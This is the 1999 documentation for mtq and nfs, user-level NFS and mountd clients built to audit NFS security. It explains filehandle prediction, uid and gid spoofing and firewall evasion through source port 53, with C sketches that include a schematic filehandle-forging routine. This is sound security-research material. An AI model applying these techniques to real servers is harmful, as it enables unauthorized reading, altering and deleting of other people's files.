*******************************
NFS and MOUNTD protocol clients
*******************************

Author: Jefferson Ogata (JO317)
Date: 1999/06/08

The principal aims of these programs are to:

- Allow systems administrators to discover, through exploration, how secure various implementations and applications of NFS are.

- Assess NFS implementations for specific vulnerabilities.

- Provide a starting point for programmers wishing to understand NFS.

I've long wondered how well NFS is implemented in the various operating systems I've worked with. But because the normal way of using NFS puts a kernel and several programs between the user and the protocol, I haven't been able to assess security to my satisfaction. I wrote these programs with security testing in mind. I was quickly rewarded with several discoveries. Here are a few examples:

- IRIX mountd leaks information about the existence of files. This could be tested with the mount program on a remote machine, but doing so requires root access. mtq allows you to test this behavior as an unprivileged user. Solaris 2.5.1 has the same problem.

- Prediction of IRIX filehandles is feasible, especially if you already have a filehandle for an inode on the same physical device, in which case it's almost trivial.

- Linux NFS has completely predictable filehandles (use the source, Luke), but performs numerous access checks throughout the NFS daemon in an attempt to render predictability unhelpful. This is slower but safer.

- Solaris 2.5.1 and IRIX allow access to objects that have unsearchable paths. If you have a filehandle for a directory, the permissions of the path leading to the directory are ignored.

**************************************
A Brief Summary Of NFS Security Issues
**************************************

RPC

The mount and NFS protocols are remote procedure call (RPC) services. RPC is a system developed by Sun for making procedure calls between hosts of differing architectures. To account for byte-order and word-size differences, RPC was built on an underlying protocol called external data representation (XDR), which standardizes the sizes of data types and the manner in which data are serialized for transmission over a network.

Each RPC program is assigned a unique program number; NFS, for example, is program 100003. The program number, along with a version number, is used to identify the particular UDP or TCP port on a remote machine that the program is bound to. This requires an intermediate program -- the RPC portmapper, also known as rpcbind. The portmapper acts as an index for all the RPC programs running on a given host. As an RPC service daemon starts up, it binds a port -- usually one assigned by the operating system -- and then informs the portmapper what port it is attached to.

The portmapper itself is an RPC program (number 100000), and other RPC programs communicate with it via the RPC mechanism. Since the portmapper is itself an RPC service, we now have a chicken-and-egg problem: how do programs know where to reach the portmapper? The answer is that unlike most RPC services, which rely on the operating system to allocate a port for them from those available, the portmapper explicitly chooses the port it listens on: TCP and UDP port 111. When an RPC program wants to communicate with the RPC portmapper, it contacts this well-known port directly. NFS also typically runs on a well-known port: 2049.
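To make this concrete, here is a minimal sketch of how a client asks a remote portmapper where mountd (program 100005) is listening. This is not part of mtq or nfs; it only assumes the classic Sun RPC client library's pmap_getport() interface, which most Unix libc's ship.

    /*
     * Minimal sketch: ask the portmapper on a remote host which UDP
     * port mountd (RPC program 100005, version 1) is bound to.
     * Error handling is kept to a bare minimum.
     */
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <netdb.h>
    #include <netinet/in.h>
    #include <rpc/rpc.h>
    #include <rpc/pmap_clnt.h>

    int main(int argc, char **argv)
    {
        struct sockaddr_in addr;
        struct hostent *hp;
        u_short port;

        if (argc != 2) { fprintf(stderr, "usage: %s host\n", argv[0]); exit(1); }
        if ((hp = gethostbyname(argv[1])) == NULL) { fprintf(stderr, "unknown host\n"); exit(1); }

        memset(&addr, 0, sizeof addr);
        addr.sin_family = AF_INET;
        addr.sin_port = htons(111);     /* the portmapper's well-known port */
        memcpy(&addr.sin_addr, hp->h_addr, hp->h_length);

        /* program 100005 = mountd, version 1, over UDP */
        port = pmap_getport(&addr, 100005, 1, IPPROTO_UDP);
        if (port == 0) { fprintf(stderr, "mountd not registered\n"); exit(1); }
        printf("mountd is on UDP port %u\n", port);
        return 0;
    }

Anything the portmapper will tell this little program it will tell an attacker, which is one reason to restrict it, as discussed below.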
The interface to an RPC program can be described in a high-level language that specifies the argument and result data structures and the procedure calls the service supports. Such descriptions are usually found in a file with a .x extension, e.g. mount.x, and the Unix tool rpcgen is used to compile a .x file into a collection of client, server, and XDR routines. This makes RPC programming relatively easy.

RPC SECURITY

Securing RPC services is a hassle. The trouble is that each time an RPC program starts up, it may be bound to a different port. This makes it difficult to set up a centralized packet-filtering firewall to keep bozos off of your RPC services.

One thing you can do is secure your portmapper. Run Wietse Venema's secure portmapper for this. It allows you to restrict access to portmap services to a limited set of hosts. But this only buys you so much. An attacker is still free to go completely around the portmapper and use a portscanner or trial and error to locate your RPC services. You should still secure your portmapper, though, to avoid leaking information about what services you are running. If the attacker doesn't know for sure you're running NFS, he may well go someplace else.

You can secure most NFS servers by filtering traffic for port 2049 (both TCP and UDP). This will help significantly, although it still leaves you vulnerable to attacks that exploit RPC-forwarding mechanisms. Certain RPC programs, e.g. rpc.statd, have the ability to forward RPC requests. This means that if an attacker can contact rpc.statd, he may be able to get it to forward an RPC request to the NFS daemon on localhost, bypassing your centralized firewall completely. Keep an eye out for updates and advisories regarding all RPC programs, keep a close inventory of which RPC programs you run on each host, and turn off all those that are not strictly necessary.

Another thing you can do is block all incoming UDP and all but selected TCP connections. This breaks a lot of things, such as passive FTP, DNS, and CORBA. You can leave holes for DNS, but someone might exploit them to sneak traffic to your RPC services by making it come from port 53. RPC, like FTP, creates a lot of problems in the security arena, specifically because it doesn't play nicely with packet filters.

FILEHANDLES

NFS and mountd use filehandles. A filehandle is a (supposedly) opaque data structure that allows an NFS server to locate a unique object. Unlike a filesystem path, a filehandle isn't supposed to be intelligible to the client; the client can't, for example, remove the last component of a filehandle and come up with the filehandle for the parent directory. The filehandle for an object's parent directory may be difficult or impossible for the client to predict.

A filehandle may refer to any type of NFS object: a regular file, a directory, a symbolic link, etc. For directories, the server provides an RPC for enumerating their contents as a list of object names. The client traverses NFS paths one component at a time using RPCs that take directory filehandles as arguments. Thus it isn't necessary for a client to know how the server's filesystem is constructed, or whether it uses a / to separate components of a pathname. Everything is simply a filehandle. If, for example, filehandle D refers to a directory, you may call the READDIR RPC with D as an argument to enumerate the contents of the directory. The result will be a list of object names. For each name, you can then call the LOOKUP RPC to acquire the filehandle for the corresponding object. The READDIR RPC, incidentally, returns a file identifier with each filename, which is typically the inode number of the file on its underlying filesystem.
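As a rough sketch of what component-at-a-time traversal looks like in code (this is essentially what any NFSv2 client, including the nfs program described later, must do under the hood), here is a LOOKUP walk. It assumes the client stubs and types rpcgen generates from the standard nfs_prot.x (<rpcsvc/nfs_prot.h>), and a CLIENT handle assumed to have been created with clnt_create(host, NFS_PROGRAM, NFS_VERSION, "udp").

    #include <stdio.h>
    #include <string.h>
    #include <rpc/rpc.h>
    #include <rpcsvc/nfs_prot.h>

    /* Look up "name" inside the directory identified by *dir, leaving
     * the resulting filehandle in *out.  Returns 0 on success. */
    int lookup_one(CLIENT *clnt, nfs_fh *dir, char *name, nfs_fh *out)
    {
        diropargs arg;
        diropres *res;

        arg.dir = *dir;
        arg.name = name;
        res = nfsproc_lookup_2(&arg, clnt);
        if (res == NULL || res->status != NFS_OK)
            return -1;
        *out = res->diropres_u.diropres.file;
        return 0;
    }

    /* Walk a path like "a/b/c" one component at a time, starting from
     * the filehandle *root (e.g. one obtained from mountd). */
    int walk_path(CLIENT *clnt, nfs_fh *root, char *path, nfs_fh *out)
    {
        char buf[1024], *comp;
        nfs_fh cur = *root;

        strncpy(buf, path, sizeof buf - 1);
        buf[sizeof buf - 1] = '\0';
        for (comp = strtok(buf, "/"); comp != NULL; comp = strtok(NULL, "/"))
            if (lookup_one(clnt, &cur, comp, &cur) != 0)
                return -1;
        *out = cur;
        return 0;
    }

Note that the server never sees the path as a whole; it sees a sequence of independent (filehandle, name) LOOKUP requests. This detail matters a great deal for the access-check discussions below.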
STATELESSNESS

One of the goals of NFS server implementation is to make it possible for NFS clients to survive a reboot of the server and resume their NFS operations transparently when the server is again available. For this to be feasible, NFS filehandles cannot change with a server reboot; they must be time-invariant. In addition, an NFS server does not keep track of how many file descriptors a client has open on a given filehandle; this statelessness likewise requires that filehandles be time-invariant. For example, suppose a client has mounted a filesystem from a local network server and has several files open when the server crashes. Unable to talk to the server, the client hangs until the server comes back up. At that point, the client can resume its NFS operations transparently, and none of the processes accessing NFS objects on the server will be informed of the server's reboot.

To implement NFS with this goal, filehandles cannot be dynamic entities, such as indices into a table of open NFS files in kernel memory; a table strategy would invalidate all existing filehandles every time the server reboots. Instead, implementors come up with techniques for embedding enough information about the file into each filehandle that the server can locate the file again even after a reboot. This is rendered particularly difficult by the fact that NFS filehandles are limited to 32 bytes in version 2 and 64 bytes in version 3, so there is not enough space to embed arbitrary path information in the filehandle.

These factors -- invariance and the limited size of filehandles -- have several repercussions on NFS security. The most straightforward way to make filehandles invariant is to use each object's inode number on its underlying filesystem as part of the filehandle. This unfortunately forces the NFS server to be able to map an inode number back to an object, which generally requires superuser access; therefore, such NFS servers cannot run as unprivileged processes. Furthermore, if an object is moved after a filehandle has been granted, permission to access the object remains intact for any client that knows the filehandle, even though the path to the object may no longer be searchable by the client. To make matters worse, it is not trivial to locate the path to an object given only its inode number -- in fact, there may be multiple paths requiring different credentials. In spite of all these drawbacks, this is the strategy most operating systems have chosen in their NFS implementations.

The server could instead build a table of filehandle-to-path mappings and keep a copy on disk so that it would survive reboots. This, however, would require a way for the NFS server to be notified when an object is renamed through its native filesystem, since renaming the object would invalidate the path to the object and leave no hint of where the object was moved to. The NFS server shipped with Red Hat Linux 5.2 does something similar: it builds its filehandles from a hashed path to each NFS object. This enables it to check permission to an object on each client access. But we still have the drawback that renaming a file invalidates its filehandles. As far as I know, no one has proposed a clean solution to all of these problems. Life goes on.
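To picture what an inode-based filehandle might contain, here is a purely illustrative layout. No particular operating system lays its filehandles out exactly this way -- real layouts vary and are deliberately undocumented -- but most embed roughly this information so that handles survive a reboot.

    #include <sys/types.h>

    #define NFS_FHSIZE 32           /* v2 filehandles: 32 opaque bytes */

    /* Toy example of an inode-based NFSv2 filehandle layout. */
    struct example_fh {
        u_int32_t fsid_major;       /* identifies the exported device */
        u_int32_t fsid_minor;
        u_int32_t inode;            /* object's inode on that device */
        u_int32_t generation;       /* inode generation, to catch reuse */
        u_int32_t export_inode;     /* inode of the export root */
        u_int32_t export_gen;
        unsigned char pad[NFS_FHSIZE - 6 * sizeof(u_int32_t)]; /* zero fill */
    };

Observe that every field here except the generation numbers can be read or inferred by an ordinary user on the native filesystem (or via READDIR's file identifier), which is exactly why the filehandle prediction attacks discussed below are feasible.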
THE MOUNT DAEMON

We now have another chicken-and-egg problem: if you need a filehandle to find another filehandle, where does the first filehandle come from? Somehow a client needs to get an initial filehandle, which points to an exported directory the client has access to. This problem is handled by the mount daemon, which hands out initial filehandles to authorized clients. How the mount daemon decides which clients are authorized varies among implementations. Usually access is based on membership in lists of hosts by name or address, and sometimes on netgroups, which are lists of hosts or, occasionally, of usernames. Generally mountd will enumerate the filesystems exported by its host at the request of any client at all. But for authorized clients, mountd will also hand out the filehandle for the directory that is the root of an exported filesystem. All future NFS operations on the filesystem are based, directly or indirectly, on this filehandle.

NFS DAEMON SECURITY

The invariance of NFS filehandles severely limits the efficacy of the security mechanism provided by mountd. If you know the filehandle for an object, you don't need to ask mountd for it, and there is typically no communication between mountd and the NFS daemon regarding which clients have been given filehandles by mountd. There are three basic strategies for getting a filehandle:

1. Ask the mount daemon or the NFS daemon for it as an authorized client. You don't necessarily have to be a privileged user on the client to do this -- most implementations don't care what port an NFS request comes from.

2. Sniff it off the network.

3. Predict it from information you know about the file. For example, if you know the inode number of the file and have a filehandle on the same filesystem, this may be quite easy.

Once you have a filehandle, you can use it from anywhere on the Internet to identify the named object on the NFS server host. Keeping filehandles secret is very difficult.

The result of all this is that for there to be any real security in an NFS implementation, authorization checks should be done not only by mountd, but also by the NFS daemon itself. What's more, these checks should be done on every NFS operation the client requests. This would affect performance, although authorization could be cached in hash tables. I keep writing in the subjunctive here because almost no NFS implementations do this; again, in the interest of simplicity and performance, most NFS daemons do very little to verify proper client credentials. Some don't even take the IP address of the client into consideration, assuming quite absurdly that if the client knows the filehandle, the access must have been authenticated by the mount daemon.

Let's elaborate on strategy 1 above (request the filehandle as an authorized client). Suppose an NFS server exports /home to all machines in an intranet. Later, IT gets it together and limits access to well-maintained Unix machines. The network is converted to perfect switches, and every machine is on its own wire. But what about all that time /home was exported to the whole intranet? If an attacker acquired a filehandle at that time, there's a good chance it's still valid. This is another pitfall of relying on obfuscation of filehandles as an NFS security measure. If this scenario happens and the NFS daemon isn't performing thorough access checks on NFS operations, the security of the system is illusory.
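Strategy 1 is only a few lines of code. Here is a sketch of asking mountd for the root filehandle of an export, as any "authorized" client would; it assumes the stubs and types rpcgen generates from the standard mount.x (<rpcsvc/mount.h>). No privileged port is required.

    #include <stdio.h>
    #include <stdlib.h>
    #include <rpc/rpc.h>
    #include <rpcsvc/mount.h>

    int main(int argc, char **argv)
    {
        CLIENT *clnt;
        fhstatus *res;
        dirpath path;
        int i;

        if (argc != 3) { fprintf(stderr, "usage: %s host export\n", argv[0]); exit(1); }

        clnt = clnt_create(argv[1], MOUNTPROG, MOUNTVERS, "udp");
        if (clnt == NULL) { clnt_pcreateerror(argv[1]); exit(1); }

        /* claim whatever Unix identity we like; the server just trusts it */
        auth_destroy(clnt->cl_auth);
        clnt->cl_auth = authunix_create_default();

        path = argv[2];
        res = mountproc_mnt_1(&path, clnt);
        if (res == NULL || res->fhs_status != 0) { fprintf(stderr, "mount denied\n"); exit(1); }

        /* the 32 opaque bytes all later NFS operations will be based on */
        for (i = 0; i < FHSIZE; i++)
            printf("%02x", (unsigned char) res->fhstatus_u.fhs_fhandle[i]);
        putchar('\n');
        return 0;
    }

The hex string this prints is, at least in spirit, the sort of thing the nfs program described later accepts as its fh argument. And per the scenario above, once printed, that string may remain valid for years.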
What about strategy 3 (predicting filehandles)? Some implementations make it absolutely trivial to predict filehandles for objects you don't have access to, as long as you have at least one filehandle on the same filesystem and know the inode number of the object you want access to. Knowing the inode number may itself be trivial: you may have read and search access to the object on its native filesystem, or you may use the NFS READDIR RPC to get the NFS file identifier, which is usually the inode number. Easy filehandle prediction is yet another repercussion of the strategy of using inode numbers to construct filehandles. Some implementations try to get around this by obfuscating the algorithm used to generate filehandles from inodes, performing some reversible mathematical operation on the filehandle before returning it to the client. This is a terribly weak measure, however, because it tempts the implementor to rely heavily on it and reduce the number of other authorization checks in the NFS daemon to improve performance. When the algorithm used to obfuscate the filehandles becomes known to the attacker, the overall security of the implementation is much lower than it would have been had the implementor made the filehandles easily predictable and secured the implementation in more robust ways.

Here's an example of how filehandle prediction can work. Suppose that a directory /home is exported from a server, and that it contains a directory /home/opaque that is unsearchable by all. Within /home/opaque is a subdirectory /home/opaque/open that is writable by all. No one should be able to do anything with /home/opaque/open, because opaque is not searchable. Specifically, if an NFS client program calls the NFS LOOKUP RPC, giving it the filehandle for /home/opaque and the name "open", the server should refuse the request. All this means, though, is that the server won't tell the client the filehandle for /home/opaque/open, and without a filehandle, there's no way for the client to operate on /home/opaque/open. But if an attacker can predict the filehandle for /home/opaque/open some other way, he might be able to go there directly. If the NFS daemon isn't checking the full path to the file a filehandle refers to, but is instead relying on the fact that it would theoretically refuse to give away the filehandle for /home/opaque/open, the directory is vulnerable.

What's more, access through unauthorized filehandles can be very surreptitious. Many mount daemons will log unauthorized mount requests, but very few NFS daemons bother to log attempts to use unauthorized filehandles. This means that an attacker may hack away at your NFS server indefinitely without a single message appearing in a log file.
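To make the mechanics concrete, here is a purely illustrative sketch of strategy 3 against the toy filehandle layout sketched earlier. Real servers lay their handles out differently (and may obfuscate them), so this is a schematic of the technique, not a working exploit; it is the kind of probing the nfs program's chroot ##filehandle command exists to test.

    #include <string.h>
    #include <sys/types.h>

    #define NFS_FHSIZE 32

    /*
     * Given one valid filehandle ("known") for any object on a
     * filesystem, forge a handle for another object on the same
     * filesystem by patching in its inode number and a guess at its
     * generation number.  Offsets match the toy struct example_fh
     * above: fsid at 0 and 4, inode at 8, generation at 12.
     */
    void forge_fh(const unsigned char *known, unsigned char *target,
                  u_int32_t ino, u_int32_t gen)
    {
        memcpy(target, known, NFS_FHSIZE);      /* keep the fsid fields */
        memcpy(target + 8, &ino, sizeof ino);   /* overwrite the inode field */
        memcpy(target + 12, &gen, sizeof gen);  /* and the generation field */
    }

If the generation number is predictable (or unused), the attacker needs nothing but an inode number -- which READDIR will happily supply.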
***********************
The NFS Client Programs
***********************

PROGRAM INVOCATION

There are two programs here: mtq and nfs. Here are the arguments they have in common:

-t
        Use TCP for RPC transport. The default is UDP.

-p port
        Bind the local endpoint of the RPC transport to the specified port number. This might let you get through a packet filter by pretending your requests are DNS answers, for example. If you are using TCP transport, this option may not work, depending on your OS.

-3
        Use protocol version 3. The default is version 1 for mountd and version 2 for NFS.

host[:port]
        Connect to the service at the specified host. If the port is not specified, the portmapper on the target host will be consulted.

mtq is a client for the mount daemon. Its other options are:

-n
        Do not query for filehandles. The method used to retrieve filehandles is to call the MOUNTPROC_MNT RPC, which may cause the mount daemon to log a mount attempt. Use this option if you are interested solely in the list of exported filesystems and their host access lists. You could get the same information using showmount -e.

The following options turn on Unix RPC authentication. This is pretty much meaningless, but it's there to test whether mount daemons care. If none of these options is specified, no authentication is used.

-u uid
        Set the uid used in Unix authentication.

-g gid
        Set the gid used in Unix authentication.

-h host
        Set the hostname used in Unix authentication.

nfs is a client for the NFS daemon. Its other argument is:

fh
        A filehandle represented as a hexadecimal string.

nfs has an interactive interface that uses the readline library to provide a fully editable command line with command completion and a history mechanism. The program resembles a command-line FTP client, and maintains a current working directory on the NFS server. nfs does not mount the remote filesystem; it can act as a client of most NFS implementations without requiring root privileges or any filesystem support from the kernel, and since normal NFS authentication is completely a matter of trust between the client and the server, nfs can freely claim to have any uid or gid on the server that you prefer. Note that uid 0 and gid 0 are mapped by most servers to -2 to prevent trusting remote users as root. There is an exports(5) option to change this behavior on the server.

After startup, nfs presents a command prompt, which indicates the current working directory on the remote NFS server, and the uid and gid that nfs is claiming for its identity. The commands nfs supports are as follows (type ? for a full list):

atime time
        Set the access time that will be used when creating remote files. If no argument is given, the current time will be used, which is the default. A variety of time formats are supported. See the parseTime function in commands.c and the man page for strptime() for more info.

cd dir
        Change the remote working directory.

chroot dir | ##filehandle
        Change the root directory. If the root directory is given in the form ##filehandle, nfs parses the given string and treats it as the filehandle of the new root. This is useful for testing whether it is possible to escape outside NFS export directories using predicted filehandles. If you really want to chroot to a path that looks like ##filehandle, simply use "chroot ./##filehandle".

exit
        Exit the program. EOF will do this also.

fh file|dir [file|dir ...]
        Report the filehandles of the named objects.

fi
        Report filesystem info. This RPC is only supported in NFS version 3.

fs
        Report filesystem status.

get file [file ...]
        Retrieve files into the local working directory. The copies in the local directory will have the same mode flags, mtimes, and atimes as the remote files.

id [uid].[gid]
        Set identity uid and/or gid. Either may be omitted, e.g. "id .4" means change to group 4, leaving the uid unmodified. The uid and gid are initially set to the uid and gid of the client process.

lcd dir
        Change the local working directory.

ls [file|dir ...]
        Does pretty much what you would expect of "ls -alinF".

mkdir dir [dir ...]
        Creates directories on the remote server. The mode flags of each directory are modified by the current umask (cf. the umask command).

more file
        Retrieve a remote file and pipe it through the more command.

mtime time
        Set the modification time that will be used when creating remote files. If no argument is given, the current time will be used, which is the default. A variety of time formats are supported. See the parseTime function in commands.c and the man page for strptime() for more info.
mv [-x] [--] file1 file2
mv [-x] [--] file1 file2 ... dir
mv [-x] [--] dir1 dir2
        Behaves pretty much like normal mv. The -- option turns off any further flag parsing and may appear anywhere in the command; this allows you to rename a file named "--" or "-x". The -x flag is kind of tricky. First of all, it can occur anywhere in the command, and it can occur multiple times. Each time it occurs it toggles a flag specifying whether to parse the remaining arguments as paths or to treat them as atomic names. If, for example, you type "mv a/b -x c/d", then nfs will attempt to rename the file "b" within the directory "a" to a file called "c/d" in the current directory. Without the -x flag, it would instead try to rename the file "b" within the directory "a" to a file called "d" within the directory "c", which is the behavior you would normally expect. Before you go off thinking that this is a useless feature, let me explain that I added it because at an earlier point in developing this program I made a semantic error dealing with mv arguments and accidentally created a file called "a/b" on an NFS server. This is not possible on most NFS implementations, but the -x option gives you a way to find out. I had a hell of a time getting rid of the file -- no Unix utility could fix things -- so I tweaked the code enough to let me rename it back to something sane via NFS, and added the -x option for later testing.

put file [file ...]
        Send files to the remote working directory. The copies in the remote directory will have the same mode flags, mtimes, and atimes as the local files. The uid and gid of the remote files will be the current uid and gid nfs is pretending to be.

rm file [file ...]
        Removes the specified files. There's no local check on permissions (everything is -f), so be careful.

rmdir dir [dir ...]
        Removes the specified directories.

touch file [file ...]
        Creates empty files. The mode flags of each file are modified by the current umask (cf. umask).

umask [mode]
        If no mode is specified, prints the current umask, which defaults to the umask of the process. The umask may be given as an octal value between 0 and 777, and that will become the new umask. The umask is only used to modify modes on the remote server; this command doesn't affect the process umask.

!cmd
        Any local Unix shell command may be run by escaping it with an exclamation point. Such commands are executed via system(3).

Command and filename completion is fairly intelligent. If you haven't typed part of a command name, completion is attempted only for the command name. If you have typed a command that takes a local object as an argument (e.g. put), completion considers local objects only, and if you have typed a command that takes a remote object as an argument, completion considers remote objects only. No completion is attempted for escaped shell commands.

BUGS

Under Solaris 2.6 using the Sun C compiler, the printf format specifier for 64-bit integer types does not appear to work. This causes bogus output from several commands. The problem does not exist under gcc.

No doubt there are numerous other bugs. Please inform the author of any you encounter. If you can come up with a patch diff, more power to you!
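For what it's worth, one possible portable workaround for the 64-bit printf problem is sketched below. It assumes a C99-style <inttypes.h> providing the PRI* format macros (Solaris ships one); whether it cures the Sun cc behavior described above is untested.

    #include <stdio.h>
    #include <inttypes.h>

    int main(void)
    {
        /* e.g. a large NFSv3 file size */
        uint64_t size = 1234567890123ULL;

        /* PRIu64 expands to the right conversion for each platform,
         * instead of hard-coding "%lld" or "%qd" */
        printf("size = %" PRIu64 "\n", size);
        return 0;
    }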